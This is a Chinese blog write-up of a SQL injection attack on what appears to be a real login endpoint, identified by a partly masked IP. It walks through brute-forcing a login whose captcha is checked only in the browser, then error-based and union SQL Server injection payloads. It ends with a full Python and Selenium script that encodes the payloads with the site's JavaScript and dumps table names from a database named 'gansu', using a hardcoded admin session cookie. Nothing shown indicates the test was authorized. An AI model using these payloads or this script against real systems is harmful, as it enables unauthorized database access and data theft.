记一次SQL Server报错注入

markdown引用远程图片功能真挫。。。

原文链接：http://wyb0.com/posts/2018/recording-an-sqlserver-sql-injection-of-error-based/

0x00 验证码前端验证

需要测试一个网站，刚开始看到网站时感觉希望不大，因为验证码是需要拖动的，这也就意味着很大可能没办法爆破，另一方面是都用这种验证码了，安全做的能很差劲吗？果然，试了admin、123456之类的都不行

40

那就抓个包吧

70

emmmmmm。 32位，md5加密？这里看着没有验证码之类的信息，把这个包发了几次发现没有出现验证码信息，而且试了试，发现有两种状态(运气比较好，有admin这个用户，我也是试的这个用户，一下子就看出返回不同了)，如下：

用户不存在时返回
{"iserror":true,"message":"用户名不存在！","data":null,"errorfieldlist":null}

用户名存在时返回
{"iserror":true,"message":"密码不正确！","data":null,"errorfieldlist":null}

可以的，验证码前端验证，我觉得可以burp抓包intruder一下

跑了top 500的用户名和top 1000的密码，除了直接试的用户名admin，其他的一个都没有跑出来 sad

0x01 存在注入

嗯看来爆破是基本没有希望了，测其他的吧，嗯，这里是登陆，那肯定要看注入的，无脑加单引号，boom！

image

11.png

80

可以的，and 1=1 有注入

哎？？！！！那不对啊，咋的后台还解密md5后进行查询？？

刚才看了数据包，用户名密码都是32位，猜想sql语句是：select password from user where username=name_md5_hash，然后判断用户存不存在之类的

看返回信息的话显然不是啊，哪有后台解密md5后查询的。。。。。。

试试post其他用户名和密码，然后看数据包

80

显然并不是md5。。。。 这个是前端加密后发送的。。。。。看一下js，结果发现了这个

80

80

emmmmm，想了想，应该可以注入的，看看啥系统

50

大概率SQL Server了(因为前几天在t00ls刚看到了一个ASP.NET+MySQL，比较任性)，所以这里看一下，发现确实是SQL Server

image

看看数据库版本，嗯，看来还是报错注入

80

可以可以，看看有几列，然后进行union注入

22.png

80

一列，这里也能大致猜出来sql语句了，估计就是：select password from user where username='admin'

那就看看数据库吧，不知道SQL Server中的concat怎么用，一个个来吧。。。。

得到第一个数据库的名字：union select name from master.dbo.sysdatabases where dbid=1

image

得到第二个数据库的名字：union select name from master.dbo.sysdatabases where dbid=2

image

得到第5个数据库的名字：union select name from master.dbo.sysdatabases where dbid=5

80

好麻烦啊，拖一下验证码，然后得到一个数据库，而且后面还有表呢。。。。。

py一下了吧，前端有js进行加密，可以本地写文件生成加密后的payload，然后python拿到payload后进行注入

0x02 尝试写php得到加密后的payload

把加密的那个js文件SkyEnCode.js保存到本地，然后写php文件，php的话接收一个未加密的payload然后返回一个加密后的payload，大致代码：

    
    
    


    
                var name = '".$name."';
                document.write('>>>'+SkyEnCode.EscKeyCode(name) +'<<<');
            ";
    ?>

看了下，返回的结果是一样的，可以用(实际上并不能。。。)

image

0x03 通过python获取js加密后的payload

本来是写python获取加密后的payload来着

def encode_payload(payload):
    html = requests.get("http://127.0.0.1/tmp.php?name={}".format(payload)).text
    m = re.findall(r'>>>(.*?)<<<', html)
    return m

但是获取到的是：[u"'+SkyEnCode.EscKeyCode(name)+'"]，因为js没有执行加载，所以得到的是js未执行时的页面源码

记得以前看过一个东西，selenium，可以调用浏览器驱动模拟浏览器点击啥的，记得可以执行js，想到就做

首先安装selenium：sudo pip install selenium --user -U

然后在http://chromedriver.storage.googleapis.com/index.html下载Chrome的驱动，然后放到/opt下

[21:07 reber@wyb in ~]
➜  ls /opt/chromedriver
/opt/chromedriver
[21:07 reber@wyb in ~]
➜  /opt/chromedriver --version
ChromeDriver 70.0.3538.97 (d035916fe243477005bc95fe2a5778b8f20b6ae1)

获取加密后payload的代码重写如下(此时已经不需要页面接收参数了，页面能引入js我们调用执行就行)：

80

python运行后得到的userName和网页上的一样

33.png

image

0x04 得到数据库的表名

数据库名的话可以通过union注入改变dbid即可得到，比较简单，表名的话这里写代码获取第5个数据库gansu的表名

image

不再继续深入

0x05 详细代码

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# code by reber <[email protected]>

import re
import time
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options

url = "http://117.156.***.***/newcc/Common/AccessToken.do"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Cookie": "currentuser_JSON=eyJpZCI6MSwiZGVsc3RhdHVzIjowLCJkZXB0aWQiOjEsInVuaXRpZCI6MSwiY2hpbmFuYW1lIjoi566h55CG5ZGYIiwibG9naW5uYW1lIjoiYWRtaW4iLCJiaXJ0aCI6bnVsbCwic2V4IjoxLCJwYXNzd29yZCI6ImthdkRhVzRoanMzK3dIeC90czhvdSsxVEYzQT0iLCJtYWlsIjoiYWRtaW5Ac2t5dGVjaC5jb20iLCJpZGNhcmQiOm51bGwsIm1vYmlsZSI6bnVsbCwicGhvbmVkZXB0IjoiMDI1ODg4ODg4ODgiLCJwaG9uZWhvbWUiOiIwMjU4ODg4ODg4OCIsInBlcm1zdHJpbmciOiI3MSw2Niw4OSw0NywxMDcsMTMxLDU4LDc4LDI0NSw5Miw0MSw1NCw1NiwxLDcsMjcsMjgsNjksMzkiLCJwZXJzb25yb2xlcyI6IjgiLCJzb3J0aW5kZXgiOjAsImlzaGFzY2FyZHR5cGUiOjAsImFkZGVyIjoxLCJhZGR0aW1lIjoiMjAwNi8wMi8yMCAxMzoyOToyNiIsIm1vZGVyIjoxLCJtb2R0aW1lIjoiMjAxNy8wOC8xOSAwOToxMDo0MCJ9",
}

def encode_payload(payload):
    chrome_options = Options()
    chrome_options.add_argument('--headless') #无头模式，不打开浏览器界面
    chrome = webdriver.Chrome(executable_path=r"/opt/chromedriver",chrome_options=chrome_options)

    try:
        chrome.get("http://127.0.0.1/tmp.php")
        # chrome.maximize_window() #不设置无头模式时最大化窗口
        # time.sleep(20) #等待请求完页面
        # print chrome.page_source #输出页面的html
        js = "var en_payload = SkyEnCode.EscKeyCode(\"{}\");return en_payload;".format(payload)
        en_payload = chrome.execute_script(js) #调用页面中加载的js代码中的加密函数
        return en_payload
    except Exception as e:
        print str(e)
    finally:
        chrome.close()

def get_tables(database):
    payload1 = "admin' and (select top 1 '~~'+name+'~~' from {}.dbo.sysobjects where xtype='U')>1--".format(database)
    payload2 = "admin' and (select top 1 '~~'+name+'~~' from {}.dbo.sysobjects where xtype='U' and name not in ({}))>1 --"

    #先得到第一张表名
    en_payload = encode_payload(payload1)
    data = {"userName": en_payload,"userPwd": "823d9ed14f2b86bb15234e4893c3ec54"}
    html = requests.post(url=url,data=data,headers=headers).content
    c_table = re.search(r'~~(.*?)~~', html).group(1)

    #通过for循环得到其他的表名
    tables = list()
    for x in xrange(5):
        tables.append("'"+c_table+"'")
        fm = ",".join(str(table) for table in tables)
        _payload = payload2.format(database,fm)
        print _payload
        data = {"userName": encode_payload(_payload),"userPwd": "9ad64932f8832810867a5b9e956206ca"}
        html = requests.post(url=url,data=data,headers=headers).content
        print html
        c_table = re.search(r'~~(.*?)~~', html).group(1)
    print tables

get_tables('gansu')